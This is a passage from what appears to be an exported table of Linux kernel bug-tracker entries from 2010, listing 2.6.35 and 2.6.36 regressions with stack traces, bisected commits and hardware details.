linux-2.6.30/drivers/input/serio/i8042.c: static void __exit i8042_exit(void) { platform_device_unregister(i8042_platform_device); platform_driver_unregister(&amp;i8042_driver); i8042_platform_exit(); panic_blink = NULL; } linux-2.6.35.2/drivers/input/serio/i8042.c: static void __exit i8042_exit(void) { platform_driver_unregister(&amp;i8042_driver); platform_device_unregister(i8042_platform_device); i8042_platform_exit(); panic_blink = NULL; } The order of platform_driver_unregister(&amp;i8042_driver) and platform_device_unregister(i8042_platform_device); has been changed Workaround: If i8042_exit() from the linux-2.6.35.2drivers/input/serio/i8042.c modified as it was done in 2.6.30 kernel: first called platform_device_unregister() and then platform_driver_unregister() everything start to work in fine 2.6.32.5 as it was in 2.6.30 kernel</t>
  </si>
  <si>
    <t>[2.6.35] usb 2.0 em28xx  kernel panic general protection fault: 0000 [#1] SMP          RIP: 0010:[&lt;ffffffffa004fbc5&gt;]  [&lt;ffffffffa004fbc5&gt;] em28xx_isoc_copy_vbi+0x62e/0x812 [em28xx]</t>
  </si>
  <si>
    <t>2010-08-17 18:10 UTC</t>
  </si>
  <si>
    <t>2010-10-11 20:23 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.35] usb 2.0 em28xx kernel panic general protection fault: 0000 [#1] SMP RIP: 0010:[&lt;ffffffffa004fbc5&gt;] [&lt;ffffffffa004fbc5&gt;] em28xx_isoc_copy_vbi+0x62e/0x812 [em28xx] Submitter : Sander Eikelenboom &lt;linux@eikelenboom.it&gt; Date : 2010-08-10 22:12 Message-ID : 61936849.20100811001257@eikelenboom.it References : http://marc.info/?l=linux-kernel&amp;m=128152075830927&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>inconsistent lock state at boot</t>
  </si>
  <si>
    <t>2.6.36-rc1</t>
  </si>
  <si>
    <t>2010-08-17 20:05 UTC</t>
  </si>
  <si>
    <t>2010-08-23 19:28 UTC</t>
  </si>
  <si>
    <t>Kernel 2.6.36-rc1 Athlon64 X2 4200 in 64bit mode Slackware64 13.1 1 GB RAM Since 2.6.36-rc1 with debug options activated (lock validation, kmemcheck, etc.), I get the following error at boot: ADDRCONF(NETDEV_UP): eth0: link is not ready uli526x: eth0 NIC Link is Up 100 Mbps Full duplex ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready ================================= [ INFO: inconsistent lock state ] 2.6.36-rc1 #2 --------------------------------- inconsistent {IN-SOFTIRQ-W} -&gt; {SOFTIRQ-ON-W} usage. iptables/1915 [HC0[0]:SC0[0]:HE1:SE1] takes: (&amp;(&amp;lock-&gt;lock)-&gt;rlock){+.?...}, at: [&lt;ffffffff814d7c01&gt;] get_counters+0x111/0x1c0 {IN-SOFTIRQ-W} state was registered at: [&lt;ffffffff81074e66&gt;] __lock_acquire+0xb96/0x1c10 [&lt;ffffffff81075f3a&gt;] lock_acquire+0x5a/0x70 [&lt;ffffffff81595996&gt;] _raw_spin_lock+0x36/0x50 [&lt;ffffffff8152bfc8&gt;] ip6t_do_table+0x88/0x4e0 [&lt;ffffffff8152e437&gt;] ip6table_filter_hook+0x17/0x20 [&lt;ffffffff8147ef54&gt;] nf_iterate+0x64/0xa0 [&lt;ffffffff8147f034&gt;] nf_hook_slow+0xa4/0x150 [&lt;ffffffff815196ab&gt;] mld_sendpack+0x28b/0x4d0 [&lt;ffffffff8151a10b&gt;] mld_ifc_timer_expire+0x27b/0x310 [&lt;ffffffff8104fade&gt;] run_timer_softirq+0x1ae/0x2e0 [&lt;ffffffff810499a0&gt;] __do_softirq+0xc0/0x160 [&lt;ffffffff8100324c&gt;] call_softirq+0x1c/0x30 [&lt;ffffffff81005585&gt;] do_softirq+0x75/0xb0 [&lt;ffffffff810494d5&gt;] irq_exit+0x95/0xa0 [&lt;ffffffff8101f5fa&gt;] smp_apic_timer_interrupt+0x6a/0xa0 [&lt;ffffffff81002d13&gt;] apic_timer_interrupt+0x13/0x20 [&lt;ffffffff81165c1d&gt;] ext4_lookup+0x9d/0x110 [&lt;ffffffff810d8f1b&gt;] do_lookup+0x1db/0x270 [&lt;ffffffff810db135&gt;] link_path_walk+0x445/0xbe0 [&lt;ffffffff810dba40&gt;] path_walk+0x60/0xe0 [&lt;ffffffff810dbbc3&gt;] do_path_lookup+0x53/0x60 [&lt;ffffffff810dc803&gt;] user_path_at+0x53/0xa0 [&lt;ffffffff810d2ed7&gt;] vfs_fstatat+0x37/0x70 [&lt;ffffffff810d2f46&gt;] vfs_stat+0x16/0x20 [&lt;ffffffff810d311f&gt;] sys_newstat+0x1f/0x50 [&lt;ffffffff810023ab&gt;] system_call_fastpath+0x16/0x1b irq event stamp: 73961 hardirqs last enabled at (73961): [&lt;ffffffff810497ae&gt;] local_bh_enable+0x7e/0x100 hardirqs last disabled at (73959): [&lt;ffffffff81049761&gt;] local_bh_enable+0x31/0x100 softirqs last enabled at (73960): [&lt;ffffffff814d7b6b&gt;] get_counters+0x7b/0x1c0 softirqs last disabled at (73914): [&lt;ffffffff814d7b1e&gt;] get_counters+0x2e/0x1c0 other info that might help us debug this: 2 locks held by iptables/1915: #0: (sk_lock-AF_INET){+.+.+.}, at: [&lt;ffffffff8149c35a&gt;] ip_getsockopt+0x6a/0xb0 #1: (&amp;xt[i].mutex){+.+.+.}, at: [&lt;ffffffff8148ac4e&gt;] xt_find_table_lock+0x3e/0x120 stack backtrace: Pid: 1915, comm: iptables Not tainted 2.6.36-rc1 #2 Call Trace: [&lt;ffffffff81072371&gt;] print_usage_bug+0x181/0x1d0 [&lt;ffffffff810727d9&gt;] mark_lock+0x419/0x630 [&lt;ffffffff81074edc&gt;] __lock_acquire+0xc0c/0x1c10 [&lt;ffffffff815957b8&gt;] ? trace_hardirqs_off_thunk+0x3a/0x3c [&lt;ffffffff815957b8&gt;] ? trace_hardirqs_off_thunk+0x3a/0x3c [&lt;ffffffff815957b8&gt;] ? trace_hardirqs_off_thunk+0x3a/0x3c [&lt;ffffffff81075f3a&gt;] lock_acquire+0x5a/0x70 [&lt;ffffffff814d7c01&gt;] ? get_counters+0x111/0x1c0 [&lt;ffffffff81072d2d&gt;] ? trace_hardirqs_on_caller+0x13d/0x180 [&lt;ffffffff81595996&gt;] _raw_spin_lock+0x36/0x50 [&lt;ffffffff814d7c01&gt;] ? get_counters+0x111/0x1c0 [&lt;ffffffff810497ae&gt;] ? local_bh_enable+0x7e/0x100 [&lt;ffffffff814d7c01&gt;] get_counters+0x111/0x1c0 [&lt;ffffffff814d7cde&gt;] alloc_counters+0x2e/0x50 [&lt;ffffffff814d94cd&gt;] ? do_ipt_get_ctl+0xfd/0x3a0 [&lt;ffffffff814d95b1&gt;] do_ipt_get_ctl+0x1e1/0x3a0 [&lt;ffffffff81072d7d&gt;] ? trace_hardirqs_on+0xd/0x10 [&lt;ffffffff814808b0&gt;] nf_sockopt+0x90/0xa0 [&lt;ffffffff814808d3&gt;] nf_getsockopt+0x13/0x20 [&lt;ffffffff8149c370&gt;] ip_getsockopt+0x80/0xb0 [&lt;ffffffff814ba391&gt;] raw_getsockopt+0x11/0x30 [&lt;ffffffff8145242f&gt;] sock_common_getsockopt+0xf/0x20 [&lt;ffffffff8144f3d0&gt;] sys_getsockopt+0x60/0xc0 [&lt;ffffffff810023ab&gt;] system_call_fastpath+0x16/0x1b I haven't managed to find the faulty module.</t>
  </si>
  <si>
    <t>close()/fsync() returns 1 or 2 (or more) on nfs v3/v4</t>
  </si>
  <si>
    <t>2.6.36-rc1-3b89f567</t>
  </si>
  <si>
    <t>2010-08-19 00:00 UTC</t>
  </si>
  <si>
    <t>2010-08-19 00:13 UTC</t>
  </si>
  <si>
    <t>nfs_file_fsync now calls nfs_commit_node(), which calls nfs_scan_commit(), which can return positive value of number of pages committed. If that number is &gt; 0, then value is propagated back from fsync to vfs_fsync to nfs_file_flush to sys_close to caller, making applications very unhappy: 15497 close(1) = 2 15497 munmap(0x7fdcaede6000, 32768) = 0 15497 write(2, "diff: ", 6) = 6 15497 write(2, "standard output", 15) = 15 15497 write(2, "\n", 1) = 1 15497 exit_group(2) = ? 15516 close(1) = 1 15516 munmap(0x7f454d92b000, 32768) = 0 15516 write(2, "diff: ", 6) = 6 15516 write(2, "standard output", 15) = 15 15516 write(2, "\n", 1) = 1 15516 exit_group(2) = ? 15535 close(1) = 1 15535 munmap(0x7f8ec09fd000, 32768) = 0 15535 write(2, "diff: ", 6) = 6 15535 write(2, "standard output", 15) = 15 15535 write(2, "\n", 1) = 1 15655 close(1) = 1 15655 munmap(0x7f9528391000, 32768) = 0 15655 write(2, "grep: ", 6) = 6 15655 write(2, "write error", 11) = 11 As far as I can tell, this is a culprit: commit af7fa16506bf9b6323e862a61e14c20555152bb3 Author: Trond Myklebust &lt;Trond.Myklebust@netapp.com&gt; Date: Sat Jul 31 14:29:06 2010 -0400 NFS: Fix up the fsync code Christoph points out that the VFS will always flush out data before calling nfs_fsync(), so we can dispense with a full call to nfs_wb_all(), and replace that with a simpler call to nfs_commit_inode(). Signed-off-by: Trond Myklebust &lt;Trond.Myklebust@netapp.com&gt; Fix seems to be to either switch to NFSv2 :-( or modify nfs_file_fsync to turn positive values returned by nfs_commit_inode to zeroes. Thanks, Petr</t>
  </si>
  <si>
    <t>Machine hangs with EIP at skb_copy_and_csum_dev</t>
  </si>
  <si>
    <t>2.6.36-rc1-00127-g763008c</t>
  </si>
  <si>
    <t>2010-08-19 09:57 UTC</t>
  </si>
  <si>
    <t>2010-09-12 17:29 UTC</t>
  </si>
  <si>
    <t>After upgrade from 2.6.33.7 to 2.6.35.2 a server hanged twice, so continued on 2.6.33.7. Today decided to try lates Linus' tree with no luck. The first time I started on 2.6.36-rc1-00127-g763008c it ran for a few minutes, then whent dead with this on the screen: [picture 1] http://picpaste.com/9cfb03116d41f27568e1bb2a67b7f4dc.jpg [picture 2] Then I power-cycled the machine, only two get this: http://picpaste.com/6d70f453e462d1aed038781ad4bdb741.jpg And because [picture 2] seemed too bad on the lower half of the screen, here is [picture 3] http://picpaste.com/0a51ae079ace2e4abd9e9d29226069f7.jpg</t>
  </si>
  <si>
    <t>fix BUG: using smp_processor_id() in preemptible code (resend)</t>
  </si>
  <si>
    <t>2010-08-19 15:01 UTC</t>
  </si>
  <si>
    <t>2010-09-12 18:04 UTC</t>
  </si>
  <si>
    <t>Subject : fix BUG: using smp_processor_id() in preemptible code (resend) Submitter : Sergey Senozhatsky &lt;sergey.senozhatsky@gmail.com&gt; Date : 2010-08-18 9:11 Message-ID : 20100818091157.GA5238@swordfish.minsk.epam.com References : http://marc.info/?l=linux-kernel&amp;m=128212276618793&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>general protection fault: 0000 [#1] PREEMPT SMP</t>
  </si>
  <si>
    <t>2.6.36-rc0</t>
  </si>
  <si>
    <t>2010-08-19 19:27 UTC</t>
  </si>
  <si>
    <t>2010-08-29 22:14 UTC</t>
  </si>
  <si>
    <t>Subject : general protection fault: 0000 [#1] PREEMPT SMP Submitter : Sergey Senozhatsky &lt;sergey.senozhatsky@gmail.com&gt; Date : 2010-08-13 13:47 Message-ID : 20100813134756.GA5235@swordfish.minsk.epam.com References : http://marc.info/?l=linux-kernel&amp;m=128170730427818&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>wdev_cleanup_work / iwlagn</t>
  </si>
  <si>
    <t>2010-08-19 20:54 UTC</t>
  </si>
  <si>
    <t>Arthur Țițeică</t>
  </si>
  <si>
    <t>2011-03-17 19:20 UTC</t>
  </si>
  <si>
    <t>This is from dmesg. After this wireless stpped working until reboot. lspci: 02:00.0 Network controller: Intel Corporation PRO/Wireless 5100 AGN [Shiloh] Network Connection ------------[ cut here ]------------ [56083.391479] WARNING: at net/wireless/core.c:633 wdev_cleanup_work+0x4a/0xa2 [cfg80211]() [56083.391482] Hardware name: HP HDX16 Notebook PC [56083.391483] Modules linked in: nls_iso8859_1 nls_cp437 vfat fat option usb_wwan usbserial usb_storage twofish twofish_common xts gf128mul aes_i586 aes_generic binfmt_misc rfcomm sco ppdev bridge stp bnep l2cap dm_crypt vboxdrv nfsd exportfs nfs lockd nfs_acl auth_rpcgss sunrpc arc4 snd_hda_codec_nvhdmi snd_hda_codec_idt snd_hda_intel snd_hda_codec snd_hwdep snd_pcm_oss snd_mixer_oss snd_pcm iwlagn snd_seq_dummy joydev coretemp snd_seq_oss vhost_net snd_seq_midi snd_rawmidi iwlcore snd_seq_midi_event macvtap snd_seq snd_timer snd_seq_device macvlan snd mac80211 uvcvideo jmb38x_ms sdhci_pci hp_accel lis3lv02d sdhci videodev lp v4l1_compat parport memstick psmouse input_polldev serio_raw led_class btusb hp_wmi video soundcore output snd_page_alloc cfg80211 bluetooth fbcon tileblit font bitblit softcursor nouveau ttm drm_kms_helper ahci drm libahci ohci1394 r8169 intel_agp i2c_algo_bit mii agpgart ieee1394 [56083.391547] Pid: 734, comm: cfg80211 Not tainted 2.6.35.2-hartlite01 #1 [56083.391550] Call Trace: [56083.391557] [&lt;c0134a7e&gt;] warn_slowpath_common+0x6a/0x7f [56083.391572] [&lt;fbeda4d9&gt;] ? wdev_cleanup_work+0x4a/0xa2 [cfg80211] [56083.391576] [&lt;c0134aa7&gt;] warn_slowpath_null+0x14/0x18 [56083.391589] [&lt;fbeda4d9&gt;] wdev_cleanup_work+0x4a/0xa2 [cfg80211] [56083.391594] [&lt;c01466d0&gt;] worker_thread+0x13f/0x1b2 [56083.391608] [&lt;fbeda48f&gt;] ? wdev_cleanup_work+0x0/0xa2 [cfg80211] [56083.391611] [&lt;c014999d&gt;] ? autoremove_wake_function+0x0/0x34 [56083.391615] [&lt;c0146591&gt;] ? worker_thread+0x0/0x1b2 [56083.391617] [&lt;c0149615&gt;] kthread+0x64/0x69 [56083.391620] [&lt;c01495b1&gt;] ? kthread+0x0/0x69 [56083.391623] [&lt;c0102efe&gt;] kernel_thread_helper+0x6/0x10 [56083.391626] ---[ end trace 91ea03912d08ffb5 ]---</t>
  </si>
  <si>
    <t>The boot process freezes and needs keyboard input to continue - Bisected to Commit 988888c, bootup hangs</t>
  </si>
  <si>
    <t>2010-08-20 00:22 UTC</t>
  </si>
  <si>
    <t>2010-08-20 23:08 UTC</t>
  </si>
  <si>
    <t>My x86_64 system with an AMD Turion 64 X2 TL-60 CPU pauses/freezes as soon as the kernel is loaded during boot. It will only proceed if some key is pressed and stops many times. I have never stayed with it, thus it may run OK once booted. The problem was bisected to: commit 9d8888c2a214aece2494a49e699a097c2ba9498b Author: Hans Rosenfeld &lt;hans.rosenfeld@amd.com&gt; Date: Wed Jul 28 19:09:31 2010 +0200 x86, cpu: Clean up AMD erratum 400 workaround Remove check_c1e_idle() and use the new AMD errata checking framework instead. Signed-off-by: Hans Rosenfeld &lt;hans.rosenfeld@amd.com&gt; LKML-Reference: &lt;1280336972-865982-2-git-send-email-hans.rosenfeld@amd.com&gt; Signed-off-by: H. Peter Anvin &lt;hpa@linux.intel.com&gt; ----- /proc/cpuinfo ----- processor : 0 vendor_id : AuthenticAMD cpu family : 15 model : 104 model name : AMD Turion(tm) 64 X2 TL-60 stepping : 2 cpu MHz : 2000.000 cache size : 512 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt rdtscp lm 3dnowext 3dnow rep_good extd_apicid pni cx16 lahf_lm cmp_legacy svm extapic cr8_legacy 3dnowprefetch lbrv bogomips : 4000.93 TLB size : 1024 4K pages clflush size : 64 cache_alignment : 64 address sizes : 40 bits physical, 48 bits virtual power management: ts fid vid ttp tm stc 100mhzsteps CPU #1 is the same.</t>
  </si>
  <si>
    <t>All blocks of an older NAND device reported bad</t>
  </si>
  <si>
    <t>2010-08-20 19:30 UTC</t>
  </si>
  <si>
    <t>2010-08-24 21:05 UTC</t>
  </si>
  <si>
    <t>Latest changes to drivers/mtd/nand/nand-{base,bbt}.c break support for the following device found on my ARM OMAP based Amstrad Delta videophone: NAND device: Manufacturer ID: 0x98, Chip ID: 0x75 (Toshiba NAND 32MiB 3,3V 8-bit) All blocks are detected bad, resulting in the device being not usable at all. The problem has been introduced with the following commit: mtd: nand: refactor BB marker detection c7b28e25cb9beb943aead770ff14551b55fa8c79 Reverting it, plus two more that depend on it, corrects the problem for me. Since I'm new to NAND, please give me a hint how I could try to correct it other than reverting the commits, which I assume may be required by other, new devices. Thanks, Janusz</t>
  </si>
  <si>
    <t>Corrupted low memory</t>
  </si>
  <si>
    <t>2010-08-21 05:02 UTC</t>
  </si>
  <si>
    <t>cjkosciuk</t>
  </si>
  <si>
    <t>2011-01-24 12:45 UTC</t>
  </si>
  <si>
    <t>[ 60.881427] Corrupted low memory at c000659c (659c phys) = 00001a00 [ 60.882418] Memory corruption dedected in low memory</t>
  </si>
  <si>
    <t>IPW5100: iwlagn broken with 2.6.34.x to 2.6.35.2 update</t>
  </si>
  <si>
    <t>2010-08-21 08:28 UTC</t>
  </si>
  <si>
    <t>Can Celasun</t>
  </si>
  <si>
    <t>2011-06-20 09:59 UTC</t>
  </si>
  <si>
    <t>Created attachment 27571 [details] iwlagn errors from kernel.log When using 2.6.35.2 my wireless connects to the AP on channel 1 (2.412 GHz) but drops the connection in roughly every 5 minutes, then auto-reconnects. dmesg is flooded with: iwlagn 0000:04:00.0: BA scd_flow 0 does not match txq_id 10 Relevant kernel log is attached. Using Archlinux and NetworkManager.</t>
  </si>
  <si>
    <t>[Bisected Regression in 2.6.35] A full tmpfs filesystem causes hibernationto hang</t>
  </si>
  <si>
    <t>2010-08-21 20:05 UTC</t>
  </si>
  <si>
    <t>2010-09-20 19:18 UTC</t>
  </si>
  <si>
    <t>Subject : [Bisected Regression in 2.6.35] A full tmpfs filesystem causes hibernationto hang Submitter : "M. Vefa Bicakci" &lt;bicave@superonline.com&gt; Date : 2010-08-15 5:25 Message-ID : 4C677A49.4030904@superonline.com References : http://marc.info/?l=linux-kernel&amp;m=128184995401968&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline. Caused by: commit bb21c7ce18eff8e6e7877ca1d06c6db719376e3c Author: KOSAKI Motohiro &lt;kosaki.motohiro@jp.fujitsu.com&gt; Date: Fri Jun 4 14:15:05 2010 -0700 vmscan: fix do_try_to_free_pages() return value when priority==0 reclaim failure First-Bad-Commit : bb21c7ce18eff8e6e7877ca1d06c6db719376e3c</t>
  </si>
  <si>
    <t>i915: bisected - "TV1 connected" with no tv</t>
  </si>
  <si>
    <t>2.6.36-rc2</t>
  </si>
  <si>
    <t>2010-08-24 12:04 UTC</t>
  </si>
  <si>
    <t>2011-01-23 16:25 UTC</t>
  </si>
  <si>
    <t>After commit 3fdef0205e69b80c4219f14b834cb85eb719039f xrandr find a connected TV when no tv is connected. 3fdef0205e69b80c4219f14b834cb85eb719039f is the first bad commit commit 3fdef0205e69b80c4219f14b834cb85eb719039f Author: Zhenyu Wang &lt;zhenyuw@linux.intel.com&gt; Date: Thu Aug 19 09:46:15 2010 +0800 drm/i915: fix render pipe control notify on sandybridge This one is missed in last pipe control fix for sandybridge, that really unmask interrupt bit for notify in render engine IMR. Signed-off-by: Zhenyu Wang &lt;zhenyuw@linux.intel.com&gt; Signed-off-by: Eric Anholt &lt;eric@anholt.net&gt; :040000 040000 c36d296bc15536a651e8d12e0133d5c729d1f225 12ae3425ce19c905da747818d9bcb7e5673e4cc5 M drivers ============================================================ Linux paolaws2 2.6.35-05848-g3fdef02 #63 PREEMPT Tue Aug 24 10:40:45 CEST 2010 i686 GNU/Linux Gnu C 4.4.5 Gnu make 3.81 binutils 2.20.1 util-linux scripts/ver_linux: 23: fdformat: not found mount support module-init-tools found Linux C Library 2.11.2 Dynamic linker (ldd) 2.11.2 Procps 3.2.8 Kbd [opzione...] Console-tools 0.2.3 Sh-utils 8.5 Modules Loaded mperf cpufreq_userspace cpufreq_stats cpufreq_powersave cpufreq_conservative uinput fuse nfsd exportfs nfs lockd fscache nfs_acl auth_rpcgss sunrpc loop arc4 ecb snd_hda_codec_realtek snd_hda_intel snd_hda_codec ath5k snd_hwdep snd_pcm_oss snd_mixer_oss mac80211 snd_pcm uvcvideo snd_seq_midi ath videodev snd_rawmidi joydev snd_seq_midi_event i915 v4l1_compat snd_seq cfg80211 drm_kms_helper snd_timer drm snd_seq_device rfkill snd psmouse i2c_i801 i2c_algo_bit soundcore intel_agp tpm_tis i2c_core tpm video agpgart ac output snd_page_alloc tpm_bios led_class wmi serio_raw pcspkr button evdev battery processor ext3 jbd mbcache dm_mod sd_mod crc_t10dif ata_generic pata_acpi uhci_hcd ahci libahci ata_piix libata ehci_hcd tg3 thermal scsi_mod usbcore libphy thermal_sys nls_base ===================================================================== LVDS1 connected 1280x800+0+0 (normal left inverted right x axis y axis) 331mm x 207mm 1280x800 60.0*+ 1024x768 85.0 75.0 70.1 60.0 832x624 74.6 800x600 85.1 72.2 75.0 60.3 56.2 640x480 85.0 72.8 75.0 59.9 720x400 85.0 640x400 85.1 640x350 85.1 VGA1 disconnected (normal left inverted right x axis y axis) TV1 connected 1024x768+0+0 (normal left inverted right x axis y axis) 0mm x 0mm 848x480 30.0 + 640x480 30.0 + 1024x768 30.0* 800x600 30.0 ========================================================================== 00:02.0 VGA compatible controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 03) (prog-if 00 [VGA controller]) Subsystem: Acer Incorporated [ALI] Device 0136 Flags: bus master, fast devsel, latency 0, IRQ 16 Memory at 54000000 (64-bit, non-prefetchable) [size=1M] Memory at 40000000 (64-bit, prefetchable) [size=256M] I/O ports at 5110 [size=8] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: [90] MSI: Enable- Count=1/1 Maskable- 64bit- Capabilities: [d0] Power Management version 3 Kernel driver in use: i915</t>
  </si>
  <si>
    <t>Kernel panic while loading intel module during boot</t>
  </si>
  <si>
    <t>2.6.35.4</t>
  </si>
  <si>
    <t>2010-08-24 13:19 UTC</t>
  </si>
  <si>
    <t>2011-01-23 16:12 UTC</t>
  </si>
  <si>
    <t>Created attachment 27791 [details] Dmesg output of the crash The kernel will panic during boot while loading intel module (in initramfs) This is an Atom-based machine: MSI AE1920 with video card 8086:a001. It was working with kernel 2.6.34.1; I might bisect when I have some time. Dmesg output is attached. I'm getting it with netconsole.</t>
  </si>
  <si>
    <t>[BUG] Nand support broken with v2.6.36-rc1</t>
  </si>
  <si>
    <t>2010-08-24 18:04 UTC</t>
  </si>
  <si>
    <t>2010-08-29 22:17 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] Nand support broken with v2.6.36-rc1 Submitter : Michael Guntsche &lt;mike@it-loops.com&gt; Date : 2010-08-17 8:52 Message-ID : 20100817085227.GA19623@gibson.comsick.at References : http://marc.info/?l=linux-kernel&amp;m=128203561203772&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel BUG at arch/x86/kvm/../../../virt/kvm/kvm_main.c:1978</t>
  </si>
  <si>
    <t>2.6.36-rc1-git2</t>
  </si>
  <si>
    <t>2010-08-24 19:04 UTC</t>
  </si>
  <si>
    <t>2010-09-13 18:01 UTC</t>
  </si>
  <si>
    <t>Subject : kernel BUG at arch/x86/kvm/../../../virt/kvm/kvm_main.c:1978 Submitter : Sergey Senozhatsky &lt;sergey.senozhatsky@gmail.com&gt; Date : 2010-08-19 9:54 Message-ID : 20100819095429.GA5201@swordfish.minsk.epam.com References : http://marc.info/?l=linux-kernel&amp;m=128221169606214&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Toshiba Laptop won't boot if I don't provide pci=nocrs on command line</t>
  </si>
  <si>
    <t>2010-08-25 16:46 UTC</t>
  </si>
  <si>
    <t>2011-01-24 12:53 UTC</t>
  </si>
  <si>
    <t>Laptop model: Toshiba L670D-10P. Please find lspci -nnvvv and DSDT in attachment. I didn't bisect anything, but my guess it that the offending commit is: commit 7bc5e3f2be32ae6fb0c74cd0f707f986b3a01a26 Author: Bjorn Helgaas &lt;bjorn.helgaas@hp.com&gt; Date: Tue Feb 23 10:24:41 2010 -0700 x86/PCI: use host bridge _CRS info by default on 2008 and newer machines The main benefit of using ACPI host bridge window information is that we can do better resource allocation in systems with multiple host bridges, e.g., http://bugzilla.kernel.org/show_bug.cgi?id=14183 Sometimes we need _CRS information even if we only have one host bridge, e.g., https://bugs.launchpad.net/ubuntu/+source/linux/+bug/341681 Most of these systems are relatively new, so this patch turns on "pci=use_crs" only on machines with a BIOS date of 2008 or newer. Signed-off-by: Bjorn Helgaas &lt;bjorn.helgaas@hp.com&gt; Signed-off-by: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; So I guess the assumption is wrong, and this 2010 laptop still doesn't report CRS information correctly. I don't know if we should revert this commit or add a DMI quirk as I propose a patch in attachment (this patch needs more explanation-verbosity though).</t>
  </si>
  <si>
    <t>[REGRESSION] [2.6.36-rc1] [DRM INTEL] [drm:intel_calculate_wm] *ERROR* Insufficient FIFO for plane, expect flickering: entries required = 36, available = 28.</t>
  </si>
  <si>
    <t>2010-08-25 17:55 UTC</t>
  </si>
  <si>
    <t>2010-09-12 18:02 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] [2.6.36-rc1] [DRM INTEL] [drm:intel_calculate_wm] *ERROR* Insufficient FIFO for plane, expect flickering: entries required = 36, available = 28. Submitter : Maciej Rutecki &lt;maciej.rutecki@gmail.com&gt; Date : 2010-08-18 18:46 Message-ID : 201008182046.37732.maciej.rutecki@gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128215721507666&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.36 regression] Under linux console gpm cursor now going to opposite direction of mouse</t>
  </si>
  <si>
    <t>2010-08-25 18:18 UTC</t>
  </si>
  <si>
    <t>2010-08-29 22:24 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.36 regression] Under linux console gpm cursor now going to opposite direction of mouse Submitter : Bruno Prémont &lt;bonbons@linux-vserver.org&gt; Date : 2010-08-20 20:33 Message-ID : 20100820223316.4f6ac734@neptune.home References : http://marc.info/?l=linux-kernel&amp;m=128233647203274&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.36-rc1 hangs during XFS barrier test for /</t>
  </si>
  <si>
    <t>2010-08-25 18:22 UTC</t>
  </si>
  <si>
    <t>2010-08-30 17:02 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.36-rc1 hangs during XFS barrier test for / Submitter : Torsten Kaiser &lt;just.for.lkml@googlemail.com&gt; Date : 2010-08-20 Message-ID : AANLkTim1PXibiY98GUdMj-UZLTav+n7GAnJ0Mjn6_5a3@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128231691708710&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>possible esata regression in 2.6.35</t>
  </si>
  <si>
    <t>2010-08-25 18:59 UTC</t>
  </si>
  <si>
    <t>2010-09-12 19:03 UTC</t>
  </si>
  <si>
    <t>Subject : possible esata regression in 2.6.35 Submitter : Nicolas Jungers &lt;nicolas@jungers.net&gt; Date : 2010-08-21 18:52 Message-ID : 4C702070.5020809@jungers.net References : http://marc.info/?l=linux-kernel&amp;m=128241685406276&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Spelling error in crypto/Kconfig: algolithms -&gt; algorithms</t>
  </si>
  <si>
    <t>2.6.35.3</t>
  </si>
  <si>
    <t>2010-08-26 16:15 UTC</t>
  </si>
  <si>
    <t>2012-05-12 16:04 UTC</t>
  </si>
  <si>
    <t>i915: 2.6.36-rc2 hoses my Intel display</t>
  </si>
  <si>
    <t>2010-08-26 19:11 UTC</t>
  </si>
  <si>
    <t>2010-09-12 18:06 UTC</t>
  </si>
  <si>
    <t>Subject : i915: 2.6.36-rc2 hoses my Intel display Submitter : Jonathan Corbet &lt;corbet@lwn.net&gt; Date : 2010-08-23 17:01 Message-ID : 20100823110145.08eb72fd@bike.lwn.net References : http://marc.info/?l=linux-kernel&amp;m=128258293327326&amp;w=2 Handled-By : Chris Wilson &lt;chris@chris-wilson.co.uk&gt; This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline. Caused by: commit 32aad86fe88e7323d4fc5e9e423abcee0d55a03d Author: Chris Wilson &lt;chris@chris-wilson.co.uk&gt; Date: Wed Aug 4 13:50:25 2010 +0100 drm/i915/sdvo: Propagate errors from reading/writing control bus. Signed-off-by: Chris Wilson &lt;chris@chris-wilson.co.uk&gt; Signed-off-by: Eric Anholt &lt;eric@anholt.net&gt; First-Bad-Commit : 32aad86fe88e7323d4fc5e9e423abcee0d55a03d</t>
  </si>
  <si>
    <t>Kernel NULL pointer dereference in r600_ioctl_wait_idle</t>
  </si>
  <si>
    <t>2010-08-28 19:49 UTC</t>
  </si>
  <si>
    <t>Stephen Kitt</t>
  </si>
  <si>
    <t>2010-09-12 19:05 UTC</t>
  </si>
  <si>
